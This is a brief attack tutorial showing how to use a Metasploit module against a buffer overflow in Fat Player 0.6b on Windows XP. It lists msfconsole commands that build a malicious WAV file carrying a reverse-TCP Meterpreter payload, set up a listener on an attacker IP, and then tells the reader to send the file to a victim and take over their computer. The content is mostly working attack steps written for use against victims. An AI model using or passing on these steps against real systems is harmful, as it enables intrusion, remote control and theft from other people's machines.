This module exploits a buffer overflow in Fat Player 0.6b. When the application is used to import a specially crafted wav file, a buffer overflow occurs allowing arbitrary code execution.
Exploit Targets
Fat Player 0.6b
Windows XP SP 2
Requirement
Attacker: Backtrack 5
Victim PC: Windows XP
Open backtrack terminal type msfconsole
Now type use exploit/windows/fileformat/fatplayer_wav
Msf exploit (fatplayer_wav)>set payload windows/meterpreter/reverse_tcp
Msf exploit (fatplayer_wav)>set lhost 192.168.1.4 (IP of Local Host)
Msf exploit (fatplayer_wav)>set srvhost 192.168.1.4
Msf exploit (fatplayer_wav)>exploit
After we successfully generate the malicious WAV File, it will stored on your local computer
/root/.msf4/local/msf.wav
Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.4
exploit
Now send your msf.wav files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer.